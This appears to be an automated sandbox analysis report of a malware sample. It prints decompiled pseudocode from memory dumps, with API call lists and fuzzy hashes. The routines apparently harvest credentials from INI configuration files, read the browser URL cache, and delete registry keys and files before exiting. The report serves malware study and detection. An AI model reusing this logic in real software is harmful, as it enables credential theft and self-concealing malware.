					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E00407F19(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E00407D89(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E00416AB6(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E00407F19(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

APIs

GetAncestor.USER32(?,00000002), ref: 00408021
SendMessageTimeoutW.USER32 ref: 0040804C
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040808E
GetWindowThreadProcessId.USER32(?,00000000), ref: 00408124
PostMessageW.USER32(?,00000112,?,?), ref: 00408177
GetWindowThreadProcessId.USER32(?,00000000), ref: 004081B6

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
Instruction ID: 00ebfd8a87f7ed5b7d6f2997a2a79c770807de206319f7e02cd51a52678822f0
Opcode Fuzzy Hash: 777d210d25c70c33b8ef28551b3f33dab2c9283d89e9b6b50b7c6f94b7f0c4b7
Instruction Fuzzy Hash: E4518130600305AAEF304E19CE85BBE3664EF15350F24053FF9C1BA2E1CA7DDD92A65A

Uniqueness

Uniqueness Score: -1.00%

Function 00418F2C, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00418F2C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E00411A47( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E0040C192(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E0040C1C2(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E0040D072(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E0040C192(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E004128DB(_t61,  &_v584);
						_t63 = 0x73;
						E004128DB(_t63,  &_v596);
						_t65 = 0x74;
						E004128DB(_t65,  &_v608);
						_t67 = 0x75;
						E004128DB(_t67,  &_v624);
						_t69 = 0x76;
						E004128DB(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E0040D0AE(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 != 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t112 =  &(_t111[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 != 0) {
											_t33 =  &(_t112[0xff]); // 0x0
											_t124 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 != 0) {
												_t89 = E0040CD11(_t124);
												__eflags = _t89;
												if(_t89 > 0) {
													_t125 =  &_v568;
													_t90 = 0x55;
													E004128DB(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t112[0xff]); // 0x0
													_push(_v644);
													_push(_t112);
													_t113 = _v636;
													_t94 = E0040CEB5(_t125, 0x311, _v636, _t125);
													_t129 = _t129 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t126 = _a4;
														_t95 = E0040C5B6(_t94, _t126, _t113);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t126 + 4;
															 *_t42 =  &(( *(_t126 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E0040C1C2(_v644);
						_t117 = _v636;
					}
					goto L20;
				} else {
					E00418EF4(_t132,  &_v524, _a4);
					goto L21;
				}
			}

0x00418f32
0x00418f50
0x00419146
0x0041914e
0x0041914e
0x00418f56
0x00418f59
0x00418f7a
0x00418f7e
0x00418f82
0x00418f84
0x00000000
0x00000000
0x00418fa1
0x00418fa3
0x00418fa5
0x00419140
0x00419141
0x00000000
0x00419141
0x00418fab
0x00418fb0
0x00418fb5
0x00418fb7
0x00000000
0x00000000
0x00418fc7
0x00418fc9
0x00418fcd
0x00418fcf
0x00418fd5
0x00418fdd
0x00418fe1
0x00418fe9
0x00418fea
0x00418ff5
0x00418ff6
0x00419001
0x00419002
0x0041900d
0x0041900e
0x00419019
0x0041901a
0x0041901f
0x0041911c
0x00419122
0x00419127
0x0041912b
0x0041912d
0x00419021
0x00419025
0x0041902e
0x00419034
0x00419036
0x00419056
0x00419058
0x0041905a
0x00419073
0x00419079
0x0041907e
0x00419083
0x00419092
0x004190a4
0x004190a6
0x004190a8
0x004190b3
0x004190b3
0x004190c5
0x004190c7
0x004190c9
0x004190cd
0x004190d2
0x004190d4
0x004190d8
0x004190dc
0x004190dd
0x004190e2
0x004190e6
0x004190ec
0x004190f6
0x004190f7
0x004190fe
0x00419103
0x00419106
0x00419108
0x0041910a
0x00419110
0x00419115
0x00419117
0x00419119
0x00419119
0x00419119
0x00419119
0x00419117
0x00419108
0x004190d4
0x004190c9
0x004190a8
0x00419083
0x0041905a
0x00000000
0x00419036
0x00419137
0x0041913c
0x0041913c
0x00000000
0x00418f5b
0x00418f66
0x00000000
0x00418f66

APIs

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

GetPrivateProfileStringW.KERNEL32 ref: 00418FA1
StrStrIW.SHLWAPI(?,?), ref: 0041902E
GetPrivateProfileStringW.KERNEL32 ref: 00419056
GetPrivateProfileIntW.KERNEL32 ref: 00419073
GetPrivateProfileStringW.KERNEL32 ref: 004190A4

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 56ef5acd8f2f4cd420e209078529e021596638388333e43c41fea14cb923cb87
Instruction ID: f3d623ec705d1555fb261c9be25218f04cc3dab65b2a6e8920ef28678abc3406
Opcode Fuzzy Hash: 56ef5acd8f2f4cd420e209078529e021596638388333e43c41fea14cb923cb87
Instruction Fuzzy Hash: 52519332504306BBDB10EB61CC55AEBB7E8EF85704F00092EF988E7191DB78DD85879A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CA62, Relevance: 9.2, APIs: 6, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CA62(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x42400c);
				_t99 = _a4;
				_t55 = E0041C2C7( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x42400c);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x423e7c;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E0040D547(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E0040C1FE(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x42400c);
					_v5 = E0041C949( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x42400c);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E0041C2C7( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E0040C1C2(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x423e7c;
					_t101 = E0040E2F8( &_v24, _t105);
					_t79 = E00415547( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E0040C1C2(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E0040C402(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E0040C192(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E0040C1C2(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E00411372(_t91, _v12, _v20);
							}
						}
					}
					E0040C1C2(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

0x0041ca68
0x0041ca73
0x0041ca79
0x0041ca7e
0x0041ca86
0x0041cc31
0x0041cc36
0x0041cc42
0x0041cc42
0x0041ca8f
0x0041ca99
0x00000000
0x00000000
0x0041caa0
0x0041caa6
0x0041caba
0x0041cabd
0x0041cabf
0x0041cac1
0x0041cac1
0x0041cac1
0x0041cac4
0x0041cac8
0x0041cbd3
0x0041cbd3
0x0041cbd6
0x0041cbd9
0x0041cbdb
0x0041cbdf
0x0041cbe1
0x0041cbe1
0x0041cbe4
0x0041cbe6
0x0041cbe8
0x0041cbec
0x0041cbfd
0x0041cbfd
0x0041cc00
0x0041cc03
0x0041cc07
0x0041cc0b
0x0041cc18
0x0041cc1d
0x0041cc1d
0x0041cc1d
0x0041cc1d
0x0041cc0b
0x0041cc20
0x0041cc23
0x0041cc25
0x0041cc27
0x0041cc27
0x0041cc29
0x0041cc29
0x0041cbdf
0x00000000
0x0041cbd9
0x0041cad6
0x0041caf0
0x0041caf3
0x0041caf9
0x0041cafd
0x0041cbc4
0x0041cbc4
0x0041cbc4
0x0041cbc4
0x0041cbcd
0x00000000
0x0041cbcd
0x0041cb06
0x0041cb08
0x0041cb0d
0x0041cb10
0x0041cbbf
0x00000000
0x0041cbbf
0x0041cb23
0x0041cb2d
0x0041cb3b
0x0041cb40
0x0041cb42
0x0041cba8
0x0041cba9
0x0041cbb1
0x0041cbb7
0x00000000
0x0041cbb7
0x0041cb4a
0x0041cb4f
0x0041cb52
0x0041cb54
0x00000000
0x00000000
0x0041cb5b
0x0041cb63
0x0041cb65
0x0041cb67
0x0041cba0
0x0041cba3
0x00000000
0x0041cba3
0x0041cb71
0x0041cb77
0x0041cb7d
0x0041cb7f
0x0041cb81
0x0041cb84
0x0041cb86
0x0041cb88
0x0041cb8c
0x0041cb95
0x0041cb95
0x0041cb8c
0x0041cb86
0x0041cb9b
0x00000000
0x0041cab0
0x0041cab3
0x0041cc30
0x00000000
0x0041cc30

APIs

EnterCriticalSection.KERNEL32(0042400C), ref: 0041CA73
LeaveCriticalSection.KERNEL32(0042400C), ref: 0041CAD6
EnterCriticalSection.KERNEL32(0042400C), ref: 0041CAF3
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041CB77
SetLastError.KERNEL32(00002EE4), ref: 0041CBCD
LeaveCriticalSection.KERNEL32(0042400C), ref: 0041CC36

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 9fa7a374c5673b1d61efaf47442f8caf39359636b16f2ff24bcfed5287600771
Instruction ID: 10912bd6cf649258f70c3458cdd4b632c3e118039f491c4c83e0e95cd0e8ea4f
Opcode Fuzzy Hash: 9fa7a374c5673b1d61efaf47442f8caf39359636b16f2ff24bcfed5287600771
Instruction Fuzzy Hash: E8515C71940209ABCF10DFA5DCC5BDE7BB4AF04324F14416AF814AB291D778DD91CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00418B35, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00418B35(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E0040C192(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E0040C1C2(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E0040D072(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E0040C192(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E004128DB(_t48,  &_v112);
					_t50 = 0x66;
					E004128DB(_t50,  &_v48);
					_t52 = 0x67;
					E004128DB(_t52,  &_v32);
					_t54 = 0x68;
					E004128DB(_t54,  &_v88);
					_t56 = 0x69;
					E004128DB(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E0040D0AE(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E004189CA(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E004128DB(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E0040CEB5(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E0040C5B6(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E0040C1C2(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x00418b35
0x00418b46
0x00418b4b
0x00418b4f
0x00418b54
0x00418cd5
0x00418cd5
0x00418b6c
0x00418b70
0x00418ccb
0x00000000
0x00418ccc
0x00418b76
0x00418b82
0x00000000
0x00000000
0x00418b92
0x00418b94
0x00418b99
0x00000000
0x00418b9f
0x00418b9f
0x00418ba7
0x00418baa
0x00418bb0
0x00418bb1
0x00418bbb
0x00418bbc
0x00418bc6
0x00418bc7
0x00418bd1
0x00418bd2
0x00418bdc
0x00418bdd
0x00418be2
0x00418cab
0x00418cb0
0x00418cb5
0x00418cba
0x00418be4
0x00418be7
0x00418bf8
0x00418c05
0x00418c09
0x00418c2e
0x00418c43
0x00418c4c
0x00418c4c
0x00418c5d
0x00418c6b
0x00418c71
0x00418c72
0x00418c77
0x00418c7a
0x00418c81
0x00418c82
0x00418c88
0x00418c8d
0x00418c92
0x00418c97
0x00418c99
0x00418ca6
0x00418ca8
0x00418ca8
0x00418ca6
0x00418c97
0x00418c5d
0x00418c43
0x00418c09
0x00000000
0x00418cc0
0x00418cc3
0x00418cc8
0x00000000
0x00418cc8
0x00418cba

APIs

GetPrivateProfileStringW.KERNEL32 ref: 00418B6C

Part of subcall function 0040C192: HeapAlloc.KERNEL32(00000008,-00000004,0040D960,00000000,?,?,?,00412A7F,00000000,00412F59,?,?,00000000), ref: 0040C1A3

StrStrIW.SHLWAPI(00000001,?), ref: 00418BF4
StrStrIW.SHLWAPI(00000001,?), ref: 00418C05
GetPrivateProfileStringW.KERNEL32 ref: 00418C21
GetPrivateProfileStringW.KERNEL32 ref: 00418C3F
GetPrivateProfileStringW.KERNEL32 ref: 00418C59

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: 2be6d454cf41ed9218d9398b10132a6bb212b0cea355619e2c026ca7901fd617
Instruction ID: 44868b22d9add0dc9408d58104c6211f2d918ebc5b3945481f54aabb602fc3fe
Opcode Fuzzy Hash: 2be6d454cf41ed9218d9398b10132a6bb212b0cea355619e2c026ca7901fd617
Instruction Fuzzy Hash: 64419F3290011AFADF10ABA5CD41EEFBB79EF44744F10452AB904F7251EB389E458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB02, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040BB02(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_t50 =  &_v1668;
				E0041349C(__ecx, _t50, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E0041349C(_t46, _t51, 2);
				PathRemoveFileSpecW(_t51);
				 *0x4238a0 =  *0x4238a0 | 0x00000002;
				_push(0);
				E0040B048();
				E0041AA8C(_t46, _t65);
				E00411830( &_v1680, _t65);
				E00411830(_t51, _t65);
				_t52 =  &_v2720;
				E0041349C(_t51, _t52, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E004128A5(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E0040CEF9( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E0040DC82(__ebx, 0x474,  &_v1168);
				}
				if( *0x423d68 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x0040bb02
0x0040bb02
0x0040bb12
0x0040bb19
0x0040bb27
0x0040bb2b
0x0040bb32
0x0040bb3a
0x0040bb3c
0x0040bb43
0x0040bb45
0x0040bb4a
0x0040bb56
0x0040bb5d
0x0040bb64
0x0040bb6b
0x0040bb78
0x0040bb94
0x0040bba3
0x0040bba7
0x0040bbab
0x0040bbac
0x0040bbb5
0x0040bbbd
0x0040bbc2
0x0040bbca
0x0040bbe4
0x0040bbe9
0x0040bbe9
0x0040bbf5
0x0040bbf9
0x0040bbf9
0x0040bc06

APIs

Part of subcall function 0041349C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423900,00000000,00000032,?,0001FE38,00000000), ref: 00413515

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0040BB27
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0040BB3A

Part of subcall function 0040B048: SetEvent.KERNEL32(0040BB4A,00000000), ref: 0040B04E
Part of subcall function 0040B048: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040B061

Part of subcall function 0041AA8C: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,00020F96), ref: 0041AAC9
Part of subcall function 0041AA8C: Sleep.KERNEL32(000001F4), ref: 0041AAD8
Part of subcall function 0041AA8C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0041AAEE

Part of subcall function 00411830: FindFirstFileW.KERNEL32(?,?,?,?,?,00020F96), ref: 00411861
Part of subcall function 00411830: FindNextFileW.KERNEL32(00000000,?), ref: 004118BC
Part of subcall function 00411830: FindClose.KERNEL32(00000000), ref: 004118C7
Part of subcall function 00411830: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00020F96), ref: 004118D3
Part of subcall function 00411830: RemoveDirectoryW.KERNEL32(?), ref: 004118DA

SHDeleteKeyW.SHLWAPI(?,?,00000003,00000000), ref: 0040BB78
CharToOemW.USER32 ref: 0040BB94
CharToOemW.USER32 ref: 0040BBA3
ExitProcess.KERNEL32 ref: 0040BBF9

Part of subcall function 0040DC82: CharToOemW.USER32 ref: 0040DCB2
Part of subcall function 0040DC82: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 0040DD36

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: e8b792806ecff0397917da2d5b05e3786dabf06989889367a4a844a6ee7f2b2c
